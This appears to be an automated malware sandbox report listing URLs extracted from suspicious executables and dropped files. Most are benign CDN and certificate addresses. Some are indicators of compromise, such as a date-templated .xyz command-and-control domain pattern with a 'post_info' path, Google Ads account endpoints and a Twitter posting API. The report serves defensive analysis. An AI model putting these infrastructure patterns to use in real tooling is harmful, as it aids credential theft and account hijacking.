Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xMWp?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xssM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xzm6?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yFoT?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hjL?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: 1611971443428.exe.2.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://ocsp.digicert.com0:
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://ocsp.digicert.com0B
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://ocsp.digicert.com0E
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://ocsp.digicert.com0F
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://ocsp.digicert.com0K
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://ocsp.digicert.com0M
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0P
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0R
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://ocsp.msocsp.com0
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: Cyfj6XGbkd.exe	String found in binary or memory: http://ocsp.thawte.com0
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
Source: download_engine.dll.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: download_engine.dll.2.dr	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 56BB1610C0318054.exe, 00000002.00000003.277318880.000000000311B000.00000004.00000001.sdmp	String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: Cyfj6XGbkd.exe	String found in binary or memory: http://sf.symcb.com/sf.crl0f
Source: Cyfj6XGbkd.exe	String found in binary or memory: http://sf.symcb.com/sf.crt0
Source: Cyfj6XGbkd.exe	String found in binary or memory: http://sf.symcd.com0&
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xCDZ.img?h=75&w=100
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xMWp.img?h=75&w=100
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xssM.img?h=75&w=100
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xzm6.img?h=250&w=30
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yFoT.img?h=75&w=100
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
Source: MiniThunderPlatform.exe.2.dr	String found in binary or memory: http://store.paycenter.uc.cn
Source: MiniThunderPlatform.exe.2.dr	String found in binary or memory: http://store.paycenter.uc.cnmail-attachment.googleusercontent.com
Source: Cyfj6XGbkd.exe	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Cyfj6XGbkd.exe	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Cyfj6XGbkd.exe	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 56BB1610C0318054.exe, 00000002.00000003.277066236.00000000031B9000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: 56BB1610C0318054.exe, 00000004.00000002.262859007.000000000325F000.00000004.00000001.sdmp	String found in binary or memory: http://www.interestvideo.com/video1.php
Source: 56BB1610C0318054.exe, 00000002.00000003.277318880.000000000311B000.00000004.00000001.sdmp	String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: 56BB1610C0318054.exe, 00000002.00000003.277318880.000000000311B000.00000004.00000001.sdmp	String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chromeJk
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://www.msn.com
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://www.msn.com/
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
Source: 1611971443428.exe, 00000008.00000002.270080121.0000000000198000.00000004.00000010.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: 1611971443428.exe, 1611971443428.exe.2.dr	String found in binary or memory: http://www.nirsoft.net/
Source: download_engine.dll.2.dr	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: download_engine.dll.2.dr	String found in binary or memory: http://www.openssl.org/support/faq.html....................
Source: Cyfj6XGbkd.exe	String found in binary or memory: http://www.vb-audio.com
Source: Cyfj6XGbkd.exe	String found in binary or memory: http://www.vb-cable.com
Source: Cyfj6XGbkd.exe	String found in binary or memory: http://www.vb-cable.comVBCABLE
Source: download_engine.dll.2.dr	String found in binary or memory: http://www.xunlei.com/
Source: download_engine.dll.2.dr	String found in binary or memory: http://www.xunlei.com/GET
Source: 56BB1610C0318054.exe, 00000004.00000003.258915262.0000000002F77000.00000004.00000001.sdmp	String found in binary or memory: http://www.youtube.com
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;g
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674
Source: 56BB1610C0318054.exe, 00000002.00000003.329844310.0000000002AB7000.00000004.00000040.sdmp	String found in binary or memory: https://A5D4CE54CC78B3CA.xyz/
Source: Web Data1611971454381.2.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259051074.0000000002F74000.00000004.00000001.sdmp	String found in binary or memory: https://accounts.google.com
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.com/nav/_/rpc/GaiaInfoService/Get?authuser=0&rpcTrackingId=GaiaInfoService.Get%3A
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.com/nav/_/rpc/UserByGaiaService/Get?authuser=0&rpcTrackingId=UserByGaiaService.Ge
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.com/nav/_/rpc/UserCustomerAccessService/List?authuser=0&rpcTrackingId=UserCustome
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.com/nav/selectaccount
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.com/nav/selectaccountocation:
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.comsec-fetch-dest:
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://api.twitter.com/1.1/statuses/update.json
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://api.twitter.com/1.1/statuses/update.jsoninclude_profile_interstitial_type=1&include_blocking
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259051074.0000000002F74000.00000004.00000001.sdmp	String found in binary or memory: https://apis.google.com
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
Source: Web Data1611971454381.2.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 56BB1610C0318054.exe, 00000004.00000003.259422321.0000000002F40000.00000004.00000001.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: 56BB1610C0318054.exe, 00000004.00000003.258743685.0000000002FCB000.00000004.00000001.sdmp, background.js.4.dr	String found in binary or memory: https://chrome.google.com/webstore/category/extension
Source: 56BB1610C0318054.exe, 00000004.00000003.259091909.00000000020EC000.00000004.00000001.sdmp	String found in binary or memory: https://chrome.google.com/webstoreAA
Source: 56BB1610C0318054.exe	String found in binary or memory: https://clients2.google.com/service/update2/cr
Source: 56BB1610C0318054.exe, 00000004.00000003.259422321.0000000002F40000.00000004.00000001.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 56BB1610C0318054.exe, 00000004.00000003.259071700.0000000002F53000.00000004.00000001.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx4
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxa
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxo
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259051074.0000000002F74000.00000004.00000001.sdmp	String found in binary or memory: https://content.googleapis.com
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://contextual.media.net/
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://contextual.media.net/48/nrrV18753.js
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: 56BB1610C0318054.exe, 00000002.00000002.334703397.000000000340F000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.262859007.000000000325F000.00000004.00000001.sdmp	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
Source: Cyfj6XGbkd.exe	String found in binary or memory: https://d.symcb.com/cps0%
Source: Cyfj6XGbkd.exe	String found in binary or memory: https://d.symcb.com/rpa0
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD3B6173
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.258915262.0000000002F77000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.258915262.0000000002F77000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/
Source: 56BB1610C0318054.exe	String found in binary or memory: https://drive.google.com/?usp=chrome_app
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/?usp=chrome_appk/B
Source: 56BB1610C0318054.exe	String found in binary or memory: https://drive.google.com/drive/settings
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/drive/settingsawl7
Source: Web Data1611971454381.2.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Web Data1611971454381.2.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Web Data1611971454381.2.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259051074.0000000002F74000.00000004.00000001.sdmp	String found in binary or memory: https://feedback.googleusercontent.com
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://fonts.googleapis.com/css?family=Google
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259051074.0000000002F74000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.googleapis.com;
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259051074.0000000002F74000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: 56BB1610C0318054.exe	String found in binary or memory: https://hangouts.google.com/
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
